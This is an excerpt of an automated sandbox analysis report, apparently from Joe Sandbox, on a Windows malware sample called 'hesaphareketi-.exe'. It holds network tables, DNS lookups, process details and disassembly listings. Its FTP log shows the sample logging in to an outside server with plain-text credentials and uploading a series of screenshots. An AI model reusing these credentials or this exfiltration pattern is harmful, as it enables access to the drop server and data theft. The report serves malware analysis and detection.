May 23, 2024 20:30:01.811038971 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811049938 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811059952 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.811063051 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811074018 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811084986 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811094999 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811105013 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.811131954 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.811172962 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.815944910 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820704937 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820719957 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820729017 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820740938 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820744991 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820755959 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820765972 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.820775986 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.867315054 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.867474079 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.932956934 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:02.278111935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:02.335674047 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.058726072 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.065123081 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.284538984 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.287297010 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.294459105 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.294996023 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.298707962 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.299890995 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.401684046 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.414865971 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:09.415007114 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.415208101 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:09.742721081 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.383380890 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.546039104 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.546269894 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556113005 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556129932 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556139946 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556149006 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556159019 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.556176901 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556215048 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556231022 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556231022 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.556231022 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.577223063 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.577326059 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.581938982 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581963062 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581971884 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581979990 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581989050 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.581996918 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582006931 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582015991 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582024097 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582032919 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582041025 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582048893 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.582154036 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.582154036 CEST | 49763 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.582180023 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.592370987 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592390060 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592398882 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592407942 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592417002 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592425108 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.592619896 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.600821972 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.600941896 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:10.607748985 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612492085 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612513065 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612523079 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.612531900 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.663853884 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.663906097 CEST | 61120 | 49762 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:10.665992022 CEST | 49762 | 61120 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:11.081517935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:11.242500067 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.682627916 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.687678099 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:17.913454056 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:17.913958073 CEST | 49764 | 56060 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.922492027 CEST | 56060 | 49764 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:17.922573090 CEST | 49764 | 56060 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.922663927 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:17.980374098 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 20:26:13.543620110 CEST | 58940 | 53 | 192.168.2.4 | 1.1.1.1 |
May 23, 2024 20:26:13.585087061 CEST | 53 | 58940 | 1.1.1.1 | 192.168.2.4 |
May 23, 2024 20:26:15.380846024 CEST | 53778 | 53 | 192.168.2.4 | 1.1.1.1 |
May 23, 2024 20:26:15.760234118 CEST | 53 | 53778 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 23, 2024 20:26:13.543620110 CEST | 192.168.2.4 | 1.1.1.1 | 0x7ba | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 23, 2024 20:26:15.380846024 CEST | 192.168.2.4 | 1.1.1.1 | 0xee9d | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 23, 2024 20:26:13.585087061 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ba | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
May 23, 2024 20:26:13.585087061 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ba | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
May 23, 2024 20:26:13.585087061 CEST | 1.1.1.1 | 192.168.2.4 | 0x7ba | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false | ||
May 23, 2024 20:26:15.760234118 CEST | 1.1.1.1 | 192.168.2.4 | 0xee9d | No error (0) | 104.247.165.99 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49732 | 104.26.12.205 | 443 | 3496 | C:\Users\user\Desktop\hesaphareketi-.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-05-23 18:26:14 UTC | 155 | OUT | |
2024-05-23 18:26:14 UTC | 211 | IN | |
2024-05-23 18:26:14 UTC | 12 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
May 23, 2024 20:28:46.731831074 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 21:28. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 21:28. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 21:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 21:28. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:28:46.732157946 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | USER admin@normagroup.com.tr |
May 23, 2024 20:28:47.127262115 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 331 User admin@normagroup.com.tr OK. Password required |
May 23, 2024 20:28:47.127713919 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASS Qb.X[.j.Yfm[ |
May 23, 2024 20:28:47.617975950 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 230 OK. Current restricted directory is / |
May 23, 2024 20:28:47.921236992 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 504 Unknown command |
May 23, 2024 20:28:47.921576977 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PWD |
May 23, 2024 20:28:48.150744915 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 257 "/" is your current location |
May 23, 2024 20:28:48.151035070 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | TYPE I |
May 23, 2024 20:28:48.499938965 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
May 23, 2024 20:28:48.500075102 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:28:48.805833101 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,244,128) |
May 23, 2024 20:28:48.854190111 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_07_28_11_34_19.jpeg |
May 23, 2024 20:28:49.593909979 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:28:50.311012983 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.532 seconds (measured here), 104.27 Kbytes per second |
May 23, 2024 20:28:50.381091118 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.532 seconds (measured here), 104.27 Kbytes per second |
May 23, 2024 20:29:00.326834917 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:29:00.568528891 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,253,66) |
May 23, 2024 20:29:00.578975916 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_08_09_10_55_29.jpeg |
May 23, 2024 20:29:01.207123995 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:29:01.702121973 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.493 seconds (measured here), 112.42 Kbytes per second |
May 23, 2024 20:29:04.308434963 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:29:04.818742037 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,229,88) |
May 23, 2024 20:29:04.829952002 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_08_13_10_17_39.jpeg |
May 23, 2024 20:29:05.467633963 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:29:05.965930939 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.496 seconds (measured here), 111.76 Kbytes per second |
May 23, 2024 20:29:14.668451071 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:29:14.906666040 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,218,145) |
May 23, 2024 20:29:14.915680885 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_08_19_17_12_53.jpeg |
May 23, 2024 20:29:15.544559002 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:29:16.068845987 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.513 seconds (measured here), 108.05 Kbytes per second |
May 23, 2024 20:29:59.728112936 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 21:29. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 21:29. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 21:29. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 21:29. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:29:59.728311062 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | USER admin@normagroup.com.tr |
May 23, 2024 20:29:59.975085020 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 331 User admin@normagroup.com.tr OK. Password required |
May 23, 2024 20:29:59.975284100 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASS Qb.X[.j.Yfm[ |
May 23, 2024 20:30:00.230171919 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 230 OK. Current restricted directory is / |
May 23, 2024 20:30:00.459373951 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 504 Unknown command |
May 23, 2024 20:30:00.459501028 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PWD |
May 23, 2024 20:30:00.683608055 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 257 "/" is your current location |
May 23, 2024 20:30:00.683875084 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | TYPE I |
May 23, 2024 20:30:00.930624008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 200 TYPE is now 8-bit binary |
May 23, 2024 20:30:00.930823088 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:30:01.158257008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,240,64) |
May 23, 2024 20:30:01.164067030 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_09_14_05_07_52.jpeg |
May 23, 2024 20:30:01.790853024 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:02.278111935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 0.487 seconds (measured here), 118.65 Kbytes per second |
May 23, 2024 20:30:09.058726072 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:30:09.284538984 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,238,192) |
May 23, 2024 20:30:09.294996023 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_09_20_19_39_17.jpeg |
May 23, 2024 20:30:10.546039104 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:10.556113005 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:30:10.556129932 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:10.556139946 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:30:10.556149006 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 150 Accepted data connection |
May 23, 2024 20:30:10.556159019 CEST | 21 | 49763 | 104.247.165.99 | 192.168.2.4 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 50 allowed.220-Local time is now 21:30. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity. |
May 23, 2024 20:30:11.081517935 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 226-File successfully transferred 226-File successfully transferred226 1.134 seconds (measured here), 48.87 Kbytes per second |
May 23, 2024 20:30:17.682627916 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | PASV |
May 23, 2024 20:30:17.913454056 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 | 227 Entering Passive Mode (104,247,165,99,218,252) |
May 23, 2024 20:30:17.922663927 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 | STOR SC_user-928100_2024_05_23_14_30_16.jpeg |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 14:26:09 |
Start date: | 23/05/2024 |
Path: | C:\Users\user\Desktop\hesaphareketi-.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x440000 |
File size: | 939'008 bytes |
MD5 hash: | 6EE05D4DD363D273CE38C497B1238DB1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 14:26:12 |
Start date: | 23/05/2024 |
Path: | C:\Users\user\Desktop\hesaphareketi-.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x730000 |
File size: | 939'008 bytes |
MD5 hash: | 6EE05D4DD363D273CE38C497B1238DB1 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | false |
Execution Graph
Execution Coverage: | 7.5% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 0% |
Total number of Nodes: | 55 |
Total number of Limit Nodes: | 1 |
Graph
Function 0275590D Relevance: 1.6, APIs: 1, Instructions: 99COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 027544E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0275B3F8 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0275B3E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0275D419 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0275B020 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0275B699 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 02759D90 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E1D4C4 Relevance: .1, Instructions: 75COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E2D1D4 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E2D01C Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E2D005 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E1D4BF Relevance: .1, Instructions: 56COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E2D1CF Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E1D745 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00E1D744 Relevance: .0, Instructions: 36COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0275DAEC Relevance: .3, Instructions: 264COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Execution Graph
Execution Coverage: | 11% |
Dynamic/Decrypted Code Coverage: | 100% |
Signature Coverage: | 1.4% |
Total number of Nodes: | 208 |
Total number of Limit Nodes: | 26 |
Graph
Function 06802358 Relevance: 9.0, Strings: 6, Instructions: 1486COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0680B218 Relevance: 8.3, Strings: 6, Instructions: 772COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06807D68 Relevance: 3.0, Strings: 2, Instructions: 471COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06805590 Relevance: 1.8, Strings: 1, Instructions: 595COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067F8FC8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 068065D8 Relevance: .8, Instructions: 825COMMON
Memory Dump Source |
|
